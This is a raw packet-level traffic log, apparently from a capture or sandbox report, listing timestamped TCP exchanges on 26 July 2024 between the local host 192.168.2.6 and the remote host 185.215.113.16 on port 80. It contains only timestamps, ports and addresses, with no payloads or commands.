Jul 26, 2024 12:57:06.153023005 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.153214931 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.153229952 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.153249979 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.153275967 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.153297901 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.153367043 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.153428078 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.154042006 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.154057026 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.154084921 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.154093027 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.154104948 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.154117107 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.154123068 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.154146910 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.154150963 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.154167891 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.154191017 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.154191971 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.154210091 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.154216051 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.154236078 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.154253006 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.154285908 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.154922009 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.154937029 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.154964924 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.154974937 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.154982090 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.155004978 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.155014038 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.155025959 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.155042887 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.155050993 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.155067921 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.155072927 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.155088902 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.155107975 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.155144930 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.155800104 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.155816078 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.155843973 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.155860901 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.155864954 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.155885935 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.155893087 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.155906916 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.155925989 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.155930996 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.155945063 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.155967951 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.155968904 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.155989885 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.156002045 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.156023979 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.156738043 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.156758070 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.156780958 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.156788111 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.156801939 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.156821966 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.156822920 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.156843901 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.156857014 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.156861067 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.156884909 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.156886101 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.156907082 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.156919003 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.156939983 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.156960011 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.157681942 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.157701015 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.157725096 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.157735109 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.157744884 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.157757998 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.157764912 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.157777071 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.157788038 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.157797098 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.157804966 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.157821894 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.157830954 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.157846928 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.157852888 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.157886028 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.157917976 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.158302069 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.158320904 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.158345938 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.158354044 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.158366919 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.158375978 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.158384085 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.158396006 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.158421040 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.166837931 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.166868925 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.166894913 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.166917086 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.166925907 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.166935921 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.166961908 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.166965961 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.166985989 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.167001009 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.167040110 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.226450920 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.226481915 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.226530075 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.226665020 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.226665020 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.226665020 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.226782084 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.226819038 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.226843119 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.226867914 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.226916075 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.226938009 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.226959944 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.226962090 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.226962090 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.226962090 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.226962090 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.226962090 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.226980925 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.227003098 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.227022886 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.227046013 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.227046013 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.227046013 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.227049112 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.227046013 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.227087975 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.227087975 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.227598906 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.227618933 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.227643013 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.227646112 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.227655888 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.227662086 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.227680922 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.227686882 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.227690935 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.227709055 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.227730036 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.227736950 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.227751970 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.227756023 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.227777004 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.227787971 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.228532076 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.228554010 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.228578091 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.228599072 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.228615999 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.228619099 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.228641033 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.228646994 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.228660107 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.228686094 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.228687048 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.228698015 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.228708029 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.228724957 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.228745937 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.229310036 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.229336023 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.229351044 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.229368925 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.229398966 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.243321896 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.243552923 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.243609905 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.243644953 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.243668079 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.243689060 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.243710041 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.243731976 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.243760109 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.243760109 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.243760109 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.243760109 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.243760109 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.243808031 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.244467974 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.244512081 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.244539022 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.244559050 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.244580030 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.244590998 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.244739056 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.244760036 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.244779110 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.244792938 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.244884014 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.244921923 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.244951963 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.244972944 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.244993925 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.244997978 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.245013952 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.245026112 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.245033979 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.245062113 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.245428085 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.245471001 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.245579958 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.245599985 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.245618105 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.245625973 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.245642900 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.245647907 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.245659113 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.245671034 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.245692968 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.245692968 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.245714903 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.245716095 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.245728970 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.245750904 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.246141911 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.246182919 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.246253014 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.246273994 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.246295929 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.246299982 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.246315002 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.246323109 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.246340036 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.246340036 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.246359110 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.246366024 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.246376991 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.246385098 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.246409893 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.246418953 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.246433020 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.246458054 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.247116089 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.247136116 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.247159958 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.247159958 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.247179031 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.247191906 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.247209072 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.247214079 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.247230053 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.247236013 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.247250080 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.247258902 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.247273922 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.247281075 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.247298956 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.247323036 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.247946024 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.247962952 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.247992039 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.247992992 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.248003006 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.248014927 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.248028994 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.248038054 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.248058081 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.248065948 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.248075008 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.248085022 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.248090982 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.248102903 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.248125076 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.248136044 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.248817921 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.248840094 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.248863935 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.248871088 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.248887062 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.248887062 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.248907089 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.248908997 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.248925924 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.248930931 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.248938084 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.248953104 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.248972893 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.248976946 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.248991966 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.248997927 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.249011040 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.249031067 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.249747992 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.249768019 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.249793053 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.249795914 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.249813080 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.249815941 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.249835014 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.249839067 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.249854088 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.249857903 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.249876022 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.249883890 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.249895096 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.249903917 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.249918938 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.249926090 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.249938011 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.249943972 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.249960899 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.249979973 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.257865906 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.257945061 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.257966042 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.258095026 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.258095026 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.258095026 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.258384943 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.258418083 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.258440971 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.258447886 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.258465052 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.258485079 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.258485079 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.258497000 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.317600012 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.317655087 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.317682981 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.317821026 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.317821026 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.317883015 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.317903042 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.317929029 CEST	80	60778	185.215.113.16	192.168.2.6
